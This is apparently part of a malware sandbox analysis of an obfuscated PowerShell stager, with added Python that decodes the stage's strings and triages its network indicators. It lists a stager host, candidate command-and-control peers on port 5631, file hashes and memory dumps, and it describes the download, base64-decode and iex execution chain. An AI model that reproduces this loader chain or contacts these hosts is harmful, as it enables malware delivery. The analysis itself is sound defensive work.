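# Only literals handed to Diskussi9 are encoded. Plain literals such as
# '\Fattenl.Stu' are used verbatim by the script and must not be decoded.
ENCODED_ARG = re.compile(r"Diskussi9\s+'([^']*)'")
PLAIN_SUFFIX = re.compile(r"\+'(\\[^']+)'")
URL_RE = re.compile(r"https?://[^\s'\"]+")

def decode_strings(script: str) -> list:
    """(encoded, decoded) pairs for every Diskussi9 argument, in script order."""
    return [(m.group(1), diskussi9(m.group(1))) for m in ENCODED_ARG.finditer(script)]

def extract_iocs(script: str, windir: str = r"C:\Windows") -> dict:
    """Download URL, relaunch interpreter path and drop-file name from the stage.
    `windir` stands in for $env:windir, which the stage prepends to the relaunch path."""
    statements = [d for _, d in decode_strings(script)]
    urls = [u for d in statements for u in URL_RE.findall(d)]
    relaunch = next((windir + d for d in statements
                     if d.startswith("\\") and d.lower().endswith("powershell.exe")), None)
    return {"urls": urls, "relaunch": relaunch,
            "drop_names": PLAIN_SUFFIX.findall(script), "statements": statements}

if __name__ == "__main__":
    for k, v in extract_iocs(STAGE).items():
        print(f"{k}: {v}")
```

The decoded statements show the staging order in plain text: fetch the URL to %APPDATA%\Fattenl.Stu, relaunch under syswow64 PowerShell, then base64-decode the file, take a 19062-character window at offset 210831 and pass it to iex. That window is the next stage, which the report's memory dumps capture but its command lines do not.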

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp
US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 240.81.21.72.in-addr.arpa | udp
US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp
US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp
US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 195.233.44.23.in-addr.arpa | udp
US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp
US | 8.8.8.8:53 | 69.121.18.2.in-addr.arpa | udp
TR | 194.55.224.183:80 | 194.55.224.183 | tcp
US | 8.8.8.8:53 | 183.224.55.194.in-addr.arpa | udp
TR | 194.55.224.183:80 | 194.55.224.183 | tcp
US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 254.131.241.8.in-addr.arpa | udp
TR | 194.55.224.183:80 | 194.55.224.183 | tcp
US | 8.8.8.8:53 | top.abuse1disabled.xyz | udp
NL | 134.19.179.139:5631 | top.abuse1disabled.xyz | tcp
US | 8.8.8.8:53 | sub.abuse2disabled.xyz | udp
US | 199.249.230.37:5631 | sub.abuse2disabled.xyz | tcp
DE | 38.242.234.206:5631 |  | tcp
US | 8.8.8.8:53 | geoplugin.net | udp
NL | 178.237.33.50:80 | geoplugin.net | tcp
US | 8.8.8.8:53 | 206.234.242.38.in-addr.arpa | udp
US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp
US | 8.8.8.8:53 | 9.173.189.20.in-addr.arpa | udp
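The Network table above (like the shorter one under behavioral1) mixes three kinds of rows: reverse (PTR) lookups in in-addr.arpa for addresses the host talked to, which are not indicators in themselves; forward DNS queries for the names the sample resolves; and the TCP connections the sample actually makes. What follows is an added example, not from the report: a Python triage of an excerpt of those rows, copied from the table, that drops the PTR noise, deduplicates repeated connections and labels each peer. The labels are analyst judgement layered on the report: the 194.55.224.183:80 connections are to the host of the URL decoded from the PowerShell stage, geoplugin.net is a public IP-geolocation service, and the three 5631/tcp peers are on a non-standard port and are candidates for the final payload's command-and-control; the report itself does not name a payload family.

```python
# Added example (not from the report): separates DNS noise from connection IOCs in
# the sandbox network table. Rows are copied from the report; the parser accepts the
# space-separated form the page was captured in and the pipe-separated form alike.
NETWORK_ROWS = """\
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
TR 194.55.224.183:80 194.55.224.183 tcp
US 8.8.8.8:53 183.224.55.194.in-addr.arpa udp
TR 194.55.224.183:80 194.55.224.183 tcp
US 8.8.8.8:53 top.abuse1disabled.xyz udp
NL 134.19.179.139:5631 top.abuse1disabled.xyz tcp
US 8.8.8.8:53 sub.abuse2disabled.xyz udp
US 199.249.230.37:5631 sub.abuse2disabled.xyz tcp
DE 38.242.234.206:5631 tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
"""

def parse_row(line: str) -> dict:
    """country, destination, optional domain, protocol -> dict."""
    parts = line.replace("|", " ").split()
    if len(parts) == 4:
        country, dest, domain, proto = parts
    elif len(parts) == 3:          # no name for this peer (the DE row in the report)
        country, dest, proto = parts
        domain = None
    else:
        raise ValueError(f"unexpected row: {line!r}")
    ip, port = dest.rsplit(":", 1)
    return {"country": country, "ip": ip, "port": int(port),
            "domain": domain, "proto": proto}

def role_for(conn: dict, stager_host: str) -> str:
    """Analyst label for a connection; every label below is a judgement, not a report finding."""
    if conn["ip"] == stager_host:
        return "stager download (host of the URL decoded from the PowerShell stage)"
    if conn["domain"] == "geoplugin.net":
        return "geolocation lookup of the victim's public IP (public service, not attacker-owned)"
    if conn["port"] not in (80, 443):
        return "non-standard port; candidate C2 for the final payload"
    return "http(s) connection"

def triage_network(table: str, stager_host: str = "194.55.224.183") -> dict:
    dns, ptr, conns = [], 0, {}
    for line in table.splitlines():
        if not line.strip() or line.lower().startswith("country"):
            continue
        row = parse_row(line)
        if row["proto"] == "udp" and row["port"] == 53:
            if row["domain"] and row["domain"].endswith(".in-addr.arpa"):
                ptr += 1            # reverse lookup of a peer address: not an IOC
            else:
                dns.append(row["domain"])
            continue
        key = (row["ip"], row["port"])
        if key not in conns:
            conns[key] = {**row, "hits": 0, "role": role_for(row, stager_host)}
        conns[key]["hits"] += 1     # the report lists each connection attempt separately
    return {"dns_queries": dns, "ptr_lookups": ptr, "connections": list(conns.values())}

if __name__ == "__main__":
    result = triage_network(NETWORK_ROWS)
    print("PTR lookups dropped:", result["ptr_lookups"])
    print("DNS queries:", result["dns_queries"])
    for c in result["connections"]:
        print(f'{c["ip"]}:{c["port"]} ({c["domain"] or "-"}, {c["country"]}) x{c["hits"]}: {c["role"]}')
```

The DE peer on 5631/tcp has no domain because the sample reached it by address; that row would be missed by a domain-only blocklist, which is why the connection list keys on ip:port rather than on name.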

Files

memory/3396-142-0x000001F1C1E80000-0x000001F1C1EA2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_byf0oizh.rtb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3396-147-0x000001F1A99F0000-0x000001F1A9A00000-memory.dmp

memory/3396-148-0x000001F1A99F0000-0x000001F1A9A00000-memory.dmp

memory/3396-149-0x000001F1A99F0000-0x000001F1A9A00000-memory.dmp

memory/1580-150-0x0000000002D00000-0x0000000002D36000-memory.dmp

memory/1580-151-0x0000000002D40000-0x0000000002D50000-memory.dmp

memory/1580-152-0x00000000056F0000-0x0000000005D18000-memory.dmp

memory/1580-153-0x0000000005D70000-0x0000000005D92000-memory.dmp

memory/1580-154-0x0000000005E20000-0x0000000005E86000-memory.dmp

memory/1580-155-0x0000000005E90000-0x0000000005EF6000-memory.dmp

memory/1580-165-0x0000000002D40000-0x0000000002D50000-memory.dmp

memory/1580-166-0x0000000006600000-0x000000000661E000-memory.dmp

memory/1580-167-0x0000000002D40000-0x0000000002D50000-memory.dmp

memory/1580-168-0x0000000007E50000-0x00000000084CA000-memory.dmp

memory/1580-169-0x0000000006BB0000-0x0000000006BCA000-memory.dmp

memory/1580-170-0x00000000078A0000-0x0000000007936000-memory.dmp

memory/1580-171-0x0000000007800000-0x0000000007822000-memory.dmp

memory/1580-172-0x0000000008A80000-0x0000000009024000-memory.dmp

memory/1580-173-0x0000000007C30000-0x0000000007C44000-memory.dmp

memory/3396-174-0x000001F1A99F0000-0x000001F1A9A00000-memory.dmp

memory/3396-175-0x000001F1A99F0000-0x000001F1A9A00000-memory.dmp

memory/3396-176-0x000001F1A99F0000-0x000001F1A9A00000-memory.dmp

memory/1580-177-0x0000000002D40000-0x0000000002D50000-memory.dmp

memory/1580-178-0x0000000002D40000-0x0000000002D50000-memory.dmp

memory/1580-179-0x0000000002D40000-0x0000000002D50000-memory.dmp

memory/1580-181-0x0000000007CD0000-0x0000000007CD1000-memory.dmp

memory/1580-182-0x0000000009030000-0x000000000C9F7000-memory.dmp

memory/3368-183-0x0000000001000000-0x00000000049C7000-memory.dmp

memory/3368-184-0x0000000001000000-0x00000000049C7000-memory.dmp

memory/3368-186-0x0000000001000000-0x00000000049C7000-memory.dmp